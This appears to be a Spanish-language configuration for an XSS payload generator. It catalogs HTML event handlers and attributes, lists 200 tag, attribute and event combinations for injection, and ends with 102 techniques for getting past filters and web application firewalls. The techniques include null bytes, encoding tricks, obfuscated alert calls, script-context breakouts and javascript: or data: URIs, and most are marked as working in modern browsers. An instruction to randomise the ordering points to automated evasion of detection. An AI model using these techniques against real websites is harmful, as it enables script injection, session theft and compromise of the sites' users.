#26  onfocusin
	#27  onfocusout
	<!-- ===================== FORMULARIOS / INPUT ===================== -->
	#28  onchange
	#29  oninput
	#30  oninvalid
	#31  onreset
	#32  onsubmit
	#33  onformchange         (experimental)
	#34  onforminput          (experimental)
	#35  onbeforeinput
	<!-- ===================== CARGA / RECURSOS ===================== -->
	#36  onload
	#37  onloadstart
	#38  onloadend
	#39  onerror
	#40  onabort
	#41  onprogress
	#42  onreadystatechange
	#43  onbeforeunload
	#44  onunload
	<!-- ===================== UI GLOBAL / DOCUMENTO ===================== -->
	#45  onresize
	#46  onscroll
	#47  onwheel
	#48  onfullscreenchange
	#49  onfullscreenerror
	#50  onafterprint
	#51  onbeforeprint
	#52  onhashchange
	#53  onlanguagechange
	#54  onmessage
	#55  onmessageerror
	#56  onoffline
	#57  ononline
	#58  onpagehide
	#59  onpageshow
	#60  onpopstate
	#61  onrejectionhandled
	#62  onstorage
	#63  onunhandledrejection
	#64  onunload
	<!-- ===================== DRAG & DROP ===================== -->
	#65  ondrag
	#66  ondragstart
	#67  ondragend
	#68  ondragenter
	#69  ondragleave
	#70  ondragover
	#71  ondrop
	<!-- ===================== MULTIMEDIA / MEDIA ===================== -->
	#72  oncanplay
	#73  oncanplaythrough
	#74  ondurationchange
	#75  onemptied
	#76  onended
	#77  onpause
	#78  onplay
	#79  onplaying
	#80  onratechange
	#81  onseeked
	#82  onseeking
	#83  onstalled
	#84  onsuspend
	#85  ontimeupdate
	#86  onvolumechange
	#87  onwaiting
	#88  onloadeddata
	#89  onloadedmetadata
	<!-- ===================== CLIPBOARD ===================== -->
	#90  oncopy
	#91  oncut
	#92  onpaste
	<!-- ===================== ANIMACIONES / TRANSICIONES ===================== -->
	#93  onanimationstart
	#94  onanimationend
	#95  onanimationiteration
	#96  ontransitionstart
	#97  ontransitionrun
	#98  ontransitionend
	#99  ontransitioncancel
	<!-- ===================== SENSORES / DISPOSITIVO ===================== -->
	#100 ondeviceorientation
	#101 ondeviceorientationabsolute
	#102 ondevicemotion
	#103 onuserproximity
	#104 ondeviceproximity          (antiguo, Firefox)
	#105 onorientationchange        (mobile)
	#106 onvrdisplayconnect          (WebVR obsoleto)
	#107 onvrdisplaydisconnect
	#108 onvrdisplayactivate
	#109 onvrdisplaydeactivate
	<!-- ===================== GAMEPAD / INPUT AVANZADO ===================== -->
	#110 ongamepadconnected
	#111 ongamepaddisconnected
	<!-- ===================== WEB SPEECH / RECOGNITION ===================== -->
	#112 onspeechstart
	#113 onspeechend
	#114 onsoundstart
	#115 onsoundend
	#116 onresult
	#117 onnomatch
	#118 onerror             (específico de SpeechRecognition también)
	#119 onaudiostart
	#120 onaudioend
	<!-- ===================== WEB NOTIFICATIONS / PUSH ===================== -->
	#121 onnotificationclick
	#122 onnotificationclose
	#123 onpush
	#124 onpushsubscriptionchange
	<!-- ===================== WEBRTC / MEDIOS EN VIVO ===================== -->
	#125 onicecandidate
	#126 oniceconnectionstatechange
	#127 onicegatheringstatechange
	#128 onnegotiationneeded
	#129 ontrack
	#130 onconnectionstatechange
	#131 onsignalingstatechange
	#132 ondatachannel
	<!-- ===================== WEB BLUETOOTH / USB / SERIAL ===================== -->
	#133 oncharacteristicvaluechanged
	#134 ongattserverdisconnected
	#135 onadvertisementreceived
	#136 onconnect            (WebUSB / WebSerial)
	#137 ondisconnect         (WebUSB / WebSerial)
	<!-- ===================== WEB XR / VR / AR ===================== -->
	#138 onsessionstart
	#139 onsessionend
	#140 oninputsourceschange
	#141 onselect
	#142 onselectstart
	#143 onselectend
	#144 onsqueeze
	#145 onsqueezestart
	#146 onsqueezeend
	#147 onvisibilitychange
	<!-- ===================== PAGOS / PAYMENT REQUEST ===================== -->
	#148 onmerchantvalidation
	#149 onshippingaddresschange
	#150 onshippingoptionchange
	#151 onpaymentmethodchange
	<!-- ===================== UI ===================== -->
	#152 onload
        #*:
        #**:
        #a:
        #0:
        #00:
        #526+:


x7_atributos_html:
        <!-- ===================== ATRIBUTOS GLOBALES (válidos en casi todas las etiquetas) ===================== -->
	#1   id
	#2   class
	#3   style
	#4   title
	#5   hidden
	#6   tabindex
	#7   accesskey
	#8   draggable
	#9   contenteditable
	#10  dir
	#11  lang
	#12  translate
	#13  spellcheck
	#14  inert
	#15  part
	#16  exportparts
	#17  slot
	#18  is                  (para custom elements)
	#19  autocapitalize
	#20  enterkeyhint
	<!-- ===================== ATRIBUTOS DE CONTENIDO / TEXTO ===================== -->
	#21  cite
	#22  datetime
	#23  data-*              (atributos personalizados)
	#24  itemid
	#25  itemprop
	#26  itemref
	#27  itemscope
	#28  itemtype
	<!-- ===================== ATRIBUTOS DE FUENTES / ENLACES ===================== -->
	#29  href
	#30  target
	#31  download
	#32  rel
	#33  hreflang
	#34  type
	#35  referrerpolicy
	#36  ping
	<!-- ===================== ATRIBUTOS DE MEDIOS / RECURSOS ===================== -->
	#37  src
	#38  srcset
	#39  sizes
	#40  crossorigin
	#41  integrity
	#42  poster
	#43  preload
	#44  autoplay
	#45  loop
	#46  muted
	#47  controls
	#48  playsinline
	#49  kind
	#50  label
	#51  default
	<!-- ===================== ATRIBUTOS DE FORMULARIOS GENERALES ===================== -->
	#52  action
	#53  method
	#54  enctype
	#55  novalidate
	#56  autocomplete
	#57  name
	#58  value
	#59  formenctype
	#60  formmethod
	#61  formnovalidate
	#62  formtarget
	#63  formaction
	<!-- ===================== ATRIBUTOS DE INPUTS ===================== -->
	#64  type
	#65  placeholder
	#66  required
	#67  readonly
	#68  disabled
	#69  multiple
	#70  maxlength
	#71  minlength
	#72  pattern
	#73  step
	#74  size
	#75  checked
	#76  selected
	#77  autofocus
	#78  list
	#79  accept
	#80  capture
	#81  inputmode
	<!-- ===================== ATRIBUTOS DE BOTONES / SUBMIT ===================== -->
	#82  formaction
	#83  formmethod
	#84  formtarget
	#85  formnovalidate
	#86  popover
	<!-- ===================== ATRIBUTOS DE LABELS / FIELDSETS ===================== -->
	#87  for
	#88  disabled
	#89  name
	<!-- ===================== ATRIBUTOS DE TABLAS ===================== -->
	#90  colspan
	#91  rowspan
	#92  headers
	#93  scope
	#94  abbr
	#95  align           (obsoleto)
	#96  valign          (obsoleto)
	#97  border
	#98  cellpadding     (obsoleto)
	#99  cellspacing     (obsoleto)
	#100 frame            (obsoleto)
	#101 rules             (obsoleto)
	#102 summary           (obsoleto)
	<!-- ===================== ATRIBUTOS DE IMÁGENES / MAPAS ===================== -->
	#103 alt
	#104 width
	#105 height
	#106 decoding
	#107 loading
	#108 fetchpriority
	#109 usemap
	#110 ismap
	#111 longdesc          (obsoleto)
	#112 referrerpolicy
	<!-- ===================== ATRIBUTOS DE <IFRAME> ===================== -->
	#113 src
	#114 srcdoc
	#115 name
	#116 sandbox
	#117 allow
	#118 allowfullscreen
	#119 loading
	#120 referrerpolicy
	<!-- ===================== ATRIBUTOS DE <SCRIPT> ===================== -->
	#121 src
	#122 type
	#123 nomodule
	#124 async
	#125 defer
	#126 integrity
	#127 crossorigin
	#128 referrerpolicy
	#129 fetchpriority
	<!-- ===================== ATRIBUTOS DE <LINK> ===================== -->
	#130 href
	#131 rel
	#132 type
	#133 media
	#134 as
	#135 sizes
	#136 crossorigin
	#137 referrerpolicy
	#138 integrity
	#139 disabled
	#140 fetchpriority
	<!-- ===================== ATRIBUTOS DE <META> ===================== -->
	#141 charset
	#142 name
	#143 content
	#144 http-equiv
	<!-- ===================== ATRIBUTOS ARIA / ACCESIBILIDAD ===================== -->
	#145 aria-label
	#146 aria-labelledby
	#147 aria-describedby
	#148 aria-hidden
	#149 aria-checked
	#150 aria-selected
	#151 aria-expanded
	#152 aria-pressed
	#153 aria-current
	#154 aria-role         (usualmente solo role)
	#155 aria-live
	#156 aria-busy
	#157 aria-disabled
	#158 aria-invalid
	#159 aria-haspopup
	#160 aria-orientation
	#161 aria-controls
	#162 aria-owns
	#163 aria-flowto
	#164 aria-autocomplete
	#165 aria-multiselectable
	#166 aria-valuenow
	#167 aria-valuemin
	#168 aria-valuemax
	#169 aria-required
	<!-- ===================== ATRIBUTOS EXPERIMENTALES HTML5+ ===================== -->
	#170 popover
	#171 inert
	#172 blocking
	#173 enterkeyhint
	#174 autocapitalize
	#175 inputmode
	#176 virtualkeyboardpolicy
	#177 allowusermedia          (origin trial)
	#178 allowpaymentrequest
	#179 importance               (fetchpriority alias)
	#180 results                   (para inputs de búsqueda)
	#181 dirname                   (inputs)
	#182 capture                    (input file cam/mic)
	<!-- ==================== ATRIBUTOS SVG COMUNES ===================== -->
	#183 fill
	#184 stroke
	#185 stroke-width
	#186 stroke-linecap
	#187 stroke-linejoin
	#188 stroke-dasharray
	#189 stroke-dashoffset
	#190 opacity
	#191 transform
	#192 transform-origin
	#193 x
	#194 y
	#195 x1
	#196 y1
	#197 x2
	#198 y2
	#199 cx
	#200 cy
	#201 r
	#202 rx
	#203 ry
	#204 d
	#205 points
	#206 viewBox
	#207 preserveAspectRatio
	#208 marker-start
	#209 marker-mid
	#210 marker-end
	#211 href
	#212 xlink:href          (obsoleto pero soportado)
	#213 clip-path
	#214 mask
	#215 filter
	#216 stop-color
	#217 stop-opacity
	<!-- ===================== ATRIBUTOS MATHML COMUNES ===================== -->
	#218 mathvariant
	#219 mathsize
	#220 mathcolor
	#221 display
	#222 scriptlevel
	#223 movablelimits
	#224 accent
	#225 stretchy
	#226 symmetric
	#227 lspace
	#228 rspace
	#229 width
	#230 height
	#231 depth
	<!-- ===================== ATRIBUTOS OBSOLETOS PUROS ===================== -->
	#232 bgcolor               (obsoleto)
	#233 background            (obsoleto)
	#234 bordercolor           (obsoleto)
	#235 frameborder           (obsoleto)
	#236 marginwidth           (obsoleto)
	#237 marginheight          (obsoleto)
	#238 scrolling             (obsoleto)
	#239 allowtransparency     (obsoleto)
	#240 language              (obsoleto)
	#241 version               (obsoleto)
	#242 profile                 (obsoleto)
	#243 http-equiv="refresh"    (obsoleto)
	#244 http-equiv="set-cookie" (obsoleto)
	#245 shape                   (obsoleto)
	#246 coords                  (obsoleto)
	#247 challenge               (obsoleto)
	#248 keytype                 (obsoleto)
	#249 pluginspage             (obsoleto)
	#250 palette                 (obsoleto)
	#251 color                   (obsoleto)
	#252 face                    (obsoleto)
	#253 size                    (obsoleto)
	#256 datafld                 (obsoleto)
	#257 datasrc                 (obsoleto)
	#258 dataformatas            (obsoleto)
	#259 code                    (obsoleto)
	#260 archive                 (obsoleto)
	#261 declare                 (obsoleto)
	#262 standby                 (obsoleto)
	#263 classid                 (obsoleto)
	#264 valuetype                                                                                                                     (obsoleto)
	#265 event                                                                                                                               (obsoleto)
	#266 for                                                                                                                                       (obsoleto)
	#267 behavior                                                                                                                                           (obsoleto)
	#268 axis                                                                                                                                                       (obsoleto)
	#269 char                                                                                                                                                                (obsoleto)
	#270 charoff                                                                                                                                                                        (obsoleto)
	#271 nowrap                                                                                                                                                                                        (obsoleto)
        #*:
        #**:
        #a:
        #0:
        #00:
        #526+:


x8_combinaciones_permitidas:
    #1:  [etiqueta:svg, atributo:onload]
    #2:  [etiqueta:img, atributo:onerror]
    #3:  [etiqueta:iframe, atributo:srcdoc]
    #4:  [etiqueta:math, atributo:href]
    #5:  [etiqueta:object, atributo:data]
    #6:  [etiqueta:script, atributo:src]
    #7:  [etiqueta:link, atributo:href]
    #8:  [etiqueta:video, atributo:poster]
    #9:  [etiqueta:audio, atributo:src]
    #10: [etiqueta:track, atributo:src]
    #11: [etiqueta:input, atributo:formaction]
    #12: [etiqueta:button, atributo:formaction]
    #13: [etiqueta:form, atributo:action]
    #14: [etiqueta:meta, atributo:http-equiv="refresh"]
    #15: [etiqueta:embed, atributo:src]
    #16: [etiqueta:applet, atributo:code]
    #17: [etiqueta:marquee, atributo:onstart]
    #18: [etiqueta:details, atributo:ontoggle]
    #19: [etiqueta:dialog, atributo:onclose]
    #20: [etiqueta:body, atributo:onload]
    #21: [etiqueta:html, atributo:manifest]
    #22: [etiqueta:svg, atributo:href]
    #23: [etiqueta:use, atributo:xlink:href]
    #24: [etiqueta:image, atributo:xlink:href]
    #25: [etiqueta:foreignObject, atributo:onclick]
    #26: [etiqueta:text, atributo:onmouseover]
    #27: [etiqueta:canvas, atributo:oncontextmenu]
    #28: [etiqueta:video, atributo:oncanplay]
    #29: [etiqueta:audio, atributo:onplay]
    #30: [etiqueta:source, atributo:src]
    #31: [etiqueta:picture, atributo:onload]
    #32: [etiqueta:iframe, atributo:src]
    #33: [etiqueta:frame, atributo:src]
    #34: [etiqueta:frameset, atributo:onload]
    #35: [etiqueta:base, atributo:href]
    #36: [etiqueta:link, atributo:rel]
    #37: [etiqueta:meta, atributo:charset]
    #38: [etiqueta:style, atributo:onload]
    #39: [etiqueta:template, atributo:onerror]
    #40: [etiqueta:slot, atributo:name]
    #41: [etiqueta:object, atributo:onclick]
    #42: [etiqueta:embed, atributo:onclick]
    #43: [etiqueta:svg, atributo:onmouseenter]
    #44: [etiqueta:path, atributo:onclick]
    #45: [etiqueta:polygon, atributo:onpointerenter]
    #46: [etiqueta:line, atributo:onfocus]
    #47: [etiqueta:circle, atributo:onmouseover]
    #48: [etiqueta:rect, atributo:onmouseenter]
    #49: [etiqueta:math, atributo:onclick]
    #50: [etiqueta:mtext, atributo:onmouseover]
    #51:  [etiqueta:ms, atributo:onmouseover]
    #52:  [etiqueta:mo, atributo:onmouseenter]
    #53:  [etiqueta:mi, atributo:onpointerover]
    #54:  [etiqueta:mrow, atributo:onclick]
    #55:  [etiqueta:semantics, atributo:onload]
    #56:  [etiqueta:annotation-xml, atributo:onclick]
    #57:  [etiqueta:foreignObject, atributo:onload]
    #58:  [etiqueta:textPath, atributo:onclick]
    #59:  [etiqueta:tspan, atributo:onmouseover]
    #60:  [etiqueta:switch, atributo:onactivate]
    #61:  [etiqueta:use, atributo:onpointerenter]
    #62:  [etiqueta:animate, atributo:onbegin]
    #63:  [etiqueta:set, atributo:onbegin]
    #64:  [etiqueta:desc, atributo:onmouseenter]
    #65:  [etiqueta:defs, atributo:onmouseover]
    #66:  [etiqueta:marker, atributo:onmouseover]
    #67:  [etiqueta:linearGradient, atributo:onload]
    #68:  [etiqueta:radialGradient, atributo:onload]
    #69:  [etiqueta:pattern, atributo:onmouseover]
    #70:  [etiqueta:style, atributo:onload]
    #71:  [etiqueta:link, atributo:onload]
    #72:  [etiqueta:meta, atributo:onerror]
    #73:  [etiqueta:iframe, atributo:onload]
    #74:  [etiqueta:body, atributo:onpageshow]
    #75:  [etiqueta:html, atributo:onunload]
    #76:  [etiqueta:frameset, atributo:onbeforeunload]
    #77:  [etiqueta:object, atributo:onfocus]
    #78:  [etiqueta:embed, atributo:onfocus]
    #79:  [etiqueta:form, atributo:onformchange]
    #80:  [etiqueta:input, atributo:onbeforeinput]
    #81:  [etiqueta:textarea, atributo:oninput]
    #82:  [etiqueta:select, atributo:onchange]
    #83:  [etiqueta:button, atributo:onfocus]
    #84:  [etiqueta:fieldset, atributo:onfocusin]
    #85:  [etiqueta:legend, atributo:onmouseenter]
    #86:  [etiqueta:label, atributo:onpointerdown]
    #87:  [etiqueta:details, atributo:open]
    #88:  [etiqueta:summary, atributo:onfocus]
    #89:  [etiqueta:dialog, atributo:open]
    #90:  [etiqueta:menu, atributo:onshow]
    #91:  [etiqueta:menuitem, atributo:onclick]
    #92:  [etiqueta:command, atributo:onclick]
    #93:  [etiqueta:marquee, atributo:onstart]
    #94:  [etiqueta:font, atributo:onmouseover]
    #95:  [etiqueta:center, atributo:onmouseenter]
    #96:  [etiqueta:big, atributo:onmouseover]
    #97:  [etiqueta:blink, atributo:onmouseover]
    #98:  [etiqueta:applet, atributo:onload]
    #99:  [etiqueta:keygen, atributo:onfocus]
    #100: [etiqueta:frame, atributo:onload]
    #101: [etiqueta:merror, atributo:mathcolor, evento:onmouseover]
    #102: [etiqueta:mfrac, atributo:mathsize, evento:onmouseenter]
    #103: [etiqueta:msubsup, atributo:mathvariant, evento:onpointerenter]
    #104: [etiqueta:msqrt, atributo:mathsize, evento:onmouseover]
    #105: [etiqueta:munder, atributo:accent, evento:onmouseenter]
    #106: [etiqueta:munderover, atributo:symmetric, evento:onmouseover]
    #107: [etiqueta:mtable, atributo:frame, evento:onmouseenter]
    #108: [etiqueta:mtr, atributo:rowalign, evento:onmouseover]
    #109: [etiqueta:mtd, atributo:columnalign, evento:onmouseenter]
    #110: [etiqueta:annotation, atributo:encoding, evento:onclick]
    #111: [etiqueta:mscarries, atributo:location, evento:onmouseover]
    #112: [etiqueta:msline, atributo:position, evento:onmouseenter]
    #113: [etiqueta:msgroup, atributo:shift, evento:onmouseover]
    #114: [etiqueta:mglyph, atributo:src, evento:onload]
    #115: [etiqueta:altGlyph, atributo:xlink:href, evento:onmouseenter]
    #116: [etiqueta:altGlyphItem, atributo:glyphRef, evento:onmouseover]
    #117: [etiqueta:glyphRef, atributo:xlink:href, evento:onmouseover]
    #118: [etiqueta:font-face, atributo:src, evento:onload]
    #119: [etiqueta:font-face-uri, atributo:xlink:href, evento:onload]
    #120: [etiqueta:font-face-src, atributo:xlink:href, evento:onload]
    #121: [etiqueta:missing-glyph, atributo:d, evento:onmouseenter]
    #122: [etiqueta:hatch, atributo:rotate, evento:onmouseenter]
    #123: [etiqueta:hatchpath, atributo:d, evento:onmouseover]
    #124: [etiqueta:meshpatch, atributo:points, evento:onmouseenter]
    #125: [etiqueta:meshrow, atributo:x, evento:onmouseover]
    #126: [etiqueta:feTurbulence, atributo:baseFrequency, evento:onmouseenter]
    #127: [etiqueta:feDisplacementMap, atributo:scale, evento:onmouseenter]
    #128: [etiqueta:feConvolveMatrix, atributo:kernelMatrix, evento:onmouseover]
    #129: [etiqueta:feSpecularLighting, atributo:surfaceScale, evento:onmouseenter]
    #130: [etiqueta:feDistantLight, atributo:azimuth, evento:onmouseenter]
    #131: [etiqueta:feSpotLight, atributo:pointsAtX, evento:onmouseover]
    #132: [etiqueta:feFuncA, atributo:type, evento:onmouseenter]
    #133: [etiqueta:feFuncB, atributo:type, evento:onmouseenter]
    #134: [etiqueta:feFuncG, atributo:type, evento:onmouseenter]
    #135: [etiqueta:feFuncR, atributo:type, evento:onmouseenter]
    #136: [etiqueta:cursor, atributo:xlink:href, evento:onload]
    #137: [etiqueta:color-profile, atributo:local, evento:onmouseenter]
    #138: [etiqueta:clipPath, atributo:clipPathUnits, evento:onmouseenter]
    #139: [etiqueta:pattern, atributo:patternUnits, evento:onmouseenter]
    #140: [etiqueta:symbol, atributo:viewBox, evento:onmouseenter]
    #141: [etiqueta:view, atributo:viewBox, evento:onmouseenter]
    #142: [etiqueta:vkern, atributo:k, evento:onmouseenter]
    #143: [etiqueta:hkern, atributo:k, evento:onmouseenter]
    #144: [etiqueta:solidcolor, atributo:solid-opacity, evento:onmouseover]
    #145: [etiqueta:foreignObject, atributo:style, evento:onmouseover]
    #146: [etiqueta:use, atributo:transform, evento:onmouseenter]
    #147: [etiqueta:g, atributo:opacity, evento:onmouseenter]
    #148: [etiqueta:desc, atributo:title, evento:onmouseover]
    #149: [etiqueta:defs, atributo:class, evento:onmouseenter]
    #150: [etiqueta:metadata, atributo:id, evento:onmouseover]
    #151: [etiqueta:marquee, atributo:bgcolor, evento:onstart]
    #152: [etiqueta:font, atributo:face, evento:onmouseover]
    #153: [etiqueta:center, atributo:align, evento:onmouseenter]
    #154: [etiqueta:big, atributo:size, evento:onmouseover]
    #155: [etiqueta:blink, atributo:style, evento:onmouseover]
    #156: [etiqueta:applet, atributo:archive, evento:onload]
    #157: [etiqueta:basefont, atributo:color, evento:onmouseover]
    #158: [etiqueta:frameset, atributo:cols, evento:onbeforeunload]
    #159: [etiqueta:frame, atributo:marginwidth, evento:onload]
    #160: [etiqueta:frame, atributo:scrolling, evento:onload]
    #161: [etiqueta:iframe, atributo:frameborder, evento:onload]
    #162: [etiqueta:object, atributo:classid, evento:onfocus]
    #163: [etiqueta:object, atributo:declare, evento:onmouseenter]
    #164: [etiqueta:object, atributo:standby, evento:onmouseover]
    #165: [etiqueta:object, atributo:code, evento:onmouseenter]
    #166: [etiqueta:object, atributo:bordercolor, evento:onmouseover]
    #167: [etiqueta:embed, atributo:pluginspage, evento:onfocus]
    #168: [etiqueta:embed, atributo:allowtransparency, evento:onmouseenter]
    #169: [etiqueta:meta, atributo:http-equiv="set-cookie", evento:onerror]
    #170: [etiqueta:meta, atributo:http-equiv="refresh", evento:onerror]
    #171: [etiqueta:body, atributo:background, evento:onload]
    #172: [etiqueta:body, atributo:bordercolor, evento:onpageshow]
    #173: [etiqueta:table, atributo:bgcolor, evento:onmouseover]
    #174: [etiqueta:td, atributo:nowrap, evento:onmouseenter]
    #175: [etiqueta:td, atributo:axis, evento:onmouseover]
    #176: [etiqueta:th, atributo:axis, evento:onmouseenter]
    #177: [etiqueta:td, atributo:char, evento:onmouseover]
    #178: [etiqueta:td, atributo:charoff, evento:onmouseenter]
    #179: [etiqueta:col, atributo:char, evento:onmouseover]
    #180: [etiqueta:col, atributo:charoff, evento:onmouseenter]
    #181: [etiqueta:area, atributo:shape, evento:onmouseenter]
    #182: [etiqueta:area, atributo:coords, evento:onmouseover]
    #183: [etiqueta:keygen, atributo:challenge, evento:onfocus]
    #184: [etiqueta:keygen, atributo:keytype, evento:onfocus]
    #185: [etiqueta:script, atributo:language, evento:onload]
    #186: [etiqueta:script, atributo:event, evento:onload]
    #187: [etiqueta:script, atributo:for, evento:onload]
    #188: [etiqueta:link, atributo:profile, evento:onload]
    #189: [etiqueta:html, atributo:version, evento:onunload]
    #190: [etiqueta:math, atributo:version, evento:onmouseenter]
    #191: [etiqueta:svg, atributo:version, evento:onmouseenter]
    #192: [etiqueta:colgroup, atributo:align, evento:onmouseover]
    #193: [etiqueta:tr, atributo:bgcolor, evento:onmouseenter]
    #194: [etiqueta:hr, atributo:color, evento:onmouseenter]
    #195: [etiqueta:hr, atributo:size, evento:onmouseenter]
    #196: [etiqueta:input, atributo:datasrc, evento:onfocus]
    #197: [etiqueta:input, atributo:datafld, evento:onfocus]
    #198: [etiqueta:input, atributo:dataformatas, evento:onfocus]
    #199: [etiqueta:param, atributo:valuetype, evento:onmouseover]
    #200: [etiqueta:td, atributo:bgcolor, evento:onmouseenter]
    #aa   aplicar entropia en el orden semanticos de etga, atributos, eventos <combinaciones válidas> etc
    #*:   última combinación usada
    #**:
    #a:
    #0:
    #00:
    #526+:



x9_tecnicas_xss:
    	  [OK] = vigente en navegadores modernos (apto para lab).
          [LEGACY] = funciona solo en navegadores muy antiguos (histórico/curiosidad).
	  #1: Espacios en blanco extra dentro de la etiqueta <script > — [OK]
	  #2: Caracteres de control en el tag (<script[\x09]>, [\x10], [\x13]) — [OK]
	  #3: Byte nulo en el nombre de la etiqueta (<scr[\x00]ipt>) — [OK]
	  #4: Engañar regex con atributo “trampa” y > en comillas (<script a=">">) — [OK]
	  #5: Nombre de archivo señuelo en src para burlar filtros por extensión — [OK]
	  #6: Uso de eventos atípicos (p. ej., onstart, onfinish) — [OK]
	  #7: Etiquetas menos comunes como vector (<svg> y similares) — [OK]
	  #8: Eventos en etiquetas “obvias” olvidadas (<body onload=...>) — [OK]
	  #9: Delimitadores atípicos en atributos (", ', `) + inyección en src — [OK]
	  #10: Comentarios/ángulos extra para romper parsers (<<script>...//<</script>) — [OK]
	  #11: Ángulo < extra al final tolerado por navegadores (<iframe ... <) — [OK]
	  #12: Reemplazar el primer espacio tras el nombre de la etiqueta por / (<img/onload=...>) — [OK]
	  #13: Comillas desordenadas o sin cerrar (autocorrección del navegador) — [OK]
	  #14: Inyección en value con comilla sin cerrar y cierre con > — [OK]
	  #15: Basura después del nombre de la etiqueta (<script/anything>) — [OK]
	  #16: Combinar métodos: meta refresh + data: + Base64 — [OK]
	  #17: Identificar campos/sinks sin filtro y priorizarlos — [OK]
	  #18: Evadir bloqueo de <script> usando etiquetas con eventos (<img onerror>, <svg onload>) — [OK]
	  #19: Romper filtros case/keyword con mayúsculas mixtas y eventos alternativos — [OK]
	  #20: Sustituir caracteres bloqueados con entidades/encodings (HTML, &lpar;, &rpar;, doble URL-encode) — [OK]
	  #21: Cerrar comentarios HTML para salir del bloque e inyectar (--> ... <!--) — [OK]
	  #22: Explotar restricciones por etiqueta con payloads específicos (<iframe src=javascript:...>, <svg onload=...>) — [OK]
	  #23: Abusar de decodificación del servidor (p. ej., html_entity_decode) para reconstruir tokens — [OK]
	  #24: Reemplazar espacios por / o + en el primer delimitador — [OK]
	  #25: Break de atributo con '"> e inyección de nueva etiqueta — [OK]
	  #26: Bypass de uppercasing con entidades numéricas (&97;&108;...) — [OK]
	  #27: Disparadores no obvios: onscroll + autofocus para provocar scroll — [OK]
	  #28: Template literals / backticks en JS (`...${...}`) y cierres </Script> mixtos — [OK]
	  #29: Doble codificación de entidad para > (&%2362; → &#62; → >) — [OK]
	  #30: Aprovechar WAF que decodifica una sola vez (segunda decodificación en el navegador) — [OK]
	  #31: Evento menos vigilado: usar onchange en lugar de onclick — [OK]
	  #32: Disparo por cambio de estado con label+checkbox oculto — [OK]
	  #33: Obfuscación de función con brackets+array (top[['alert'][0]](...)) — [OK]
	  #34: Evasión de firmas mediante acceso alternativo a propiedades (sin .alert) — [OK]
	  #35: Sustituir document.domain por location.hostname — [OK]
	  #36: Superficie de click forzada (position:fixed; inset:0 en <label>) — [OK]
	  #37: Elemento de interacción invisible (display:none en checkbox) — [OK]
	  #38: Auto-limpieza del artefacto (this.remove()) — [OK]
	  #39: Sin concatenación con comillas (evita reglas por "+"/'+) — [OK]
	  #40: Sin invocación directa alert() (reduce heurísticas) — [OK]
	  #41: Salir de <script> y meter comentario para reabrir contexto seguro — [OK]
	  #42: Codificar onload= (p. ej., %3D) + usar coma/find para ocultar invocación — [OK]
	  #43: Cerrar </script> con tag malformado para desincronizar parser — [OK]
	  #44: Codificar paréntesis y especiales (%26rpar;, &lpar;, &#41;) — [OK]
	  #45: Atributos señuelo masivos para romper regex y ocultar href real — [OK]
	  #46: Acceso alternativo a función vía brackets/arrays ([1].find(...), top[...]) — [OK]
	  #47: Carga de script externo directa (<script src=...>) — [OK]
	  #48: Políglota multi-contexto (HTML/JS/URL) — [OK]
	  #49: Etiqueta <a> malformada sin href con evento (onmouseover) — [OK]
	  #50: IMG malformado que fuerza parseo laxo e inyecta <script> — [OK]
	  #51: Reconstruir JS con fromCharCode / atob — [OK]
	  #52: SRC por defecto (#, vacío u omitido) + evento — [OK]
	  #53: onerror en IMG para ejecutar handler — [OK]
	  #54: Entidades decimales/hex para javascript: / alert / paréntesis — [OK]
	  #55: Entidades sin ; (padding 1–7 dígitos) — [OK]
	  #56: Tabs/NL/CR incrustados en javascript: — [OK]
	  #57: Byte nulo %00 en java\0script: — [OK]
	  #58: Separadores ASCII 1–32 antes de javascript: — [OK]
	  #59: Tag split con / (<SCRIPT/XSS ...>, <SCRIPT/SRC=...>) — [OK]
	  #60: Carácter no alfanumérico entre evento y = (tolerancia Gecko) — [OK]
	  #61: SCRIPT sin </script> (autocierre por HTML siguiente) — [OK]
	  #62: SRC protocol-relative //host/.j (resolución de protocolo) — [OK]
	  #63: Vector “medio abierto” dependiente de HTML debajo (sin >) — [OK]
	  #64: Escapar el escape en JS embebido (\";alert(1);//) — [OK]
	  #65: Cerrar </script> y abrir otro <script> — [OK]
	  #66: Cerrar </title> y abrir <script> — [OK]
	  #67: <svg/onload=...> (evento de carga) — [OK]
	  #68: <body onload/onscroll/...> como vector global — [OK]
	  #69: Catálogo amplio de eventos (copy/paste/drag/print/wheel, etc.) — [OK]
	  #70: formaction=javascript: en <button>/<input type=submit> — [OK]
	  #71: href=javascript: con obfuscación (tabs/NL/entidades) — [OK]
	  #72: URL con IP/hex/octal/DWORD para evadir listas por host — [OK]
	  #73: Mezcla de codificaciones (base64 + tabs/NL entre comillas) — [OK]
	  #74: Omisión de esquema (//example) y CNAME stripping — [OK]
	  #75: javascript: vía reemplazo/transformación de contenido — [OK]
	  #76: HTTP Parameter Pollution para promover JS ejecutable — [OK]
	  #77: Variantes escapadas de < (HTML/JS/URL) para reconstruir — [OK]
	  #78: XSS almacenado (ejecución en render) — [OK]
	  #79: Reflected-in-JS (inyectar en setTimeout(...) etc.) — [OK]
	  #80: DOM-XSS (sinks eval, innerHTML, etc.) — [OK]
	  #81: Redirección a data: base64 para cargar HTML ejecutable — [OK]
	  #82: data:/javascript: en iframe/src — [OK]
	  #83: video/source onerror / img onerror con eval(src) o brackets — [OK]
	  #84: meta refresh → javascript: — [OK]
	  #85: meta refresh → data:text/html;base64,... — [OK]
	  #86: svg <script xlink:href=data:,...> — [OK]
	  #87: Unicode escapes en función (p. ej., \u0061lert) en javascript: — [OK]
	  #88: Ofuscación de alert (brackets, regex .source, \u, .toString(30), optional chaining) — [OK]
	  #89: Backticks envolventes en sinks que lo requieren ( `${alert}` ``) — [OK]
	  #90: Cerrar comentario HTML en mitad de palabra (javas<!-- -->cript) — [OK]
	  #91: meta http-equiv=Set-Cookie con JS embebido — [OK]
	  #92: embed data:image/svg+xml;base64,... con <script> (Fx-only) — [OK]
	  #93: IMG “comandos administrativos” (CSRF-like) bajo sesión — [OK]
	  #94: 302/304 redirect de imagen hacia acción peligrosa — [OK]
	  #95: Bypass de resolución de protocolo en WAF (evitar http(s)://) — [OK]
	  #96: document.write("<SCRI");</SCRIPT>PT ... para dividir firmas — [OK]
	  #97: Atributos hoy no ejecutables (background="javascript:...", dynsrc, lowsrc) — [LEGACY]
	  #98: <link rel=stylesheet href="javascript:..."> — [LEGACY]
	  #99: CSS background:url(javascript:...) — [LEGACY]
	  #100: CSS expression() / xss:expression(...) — [LEGACY]
	  #101: style @import 'javascript:...' — [LEGACY]
	  #102: -moz-binding:url(...#xss) (XUL binding) — [LEGACY]
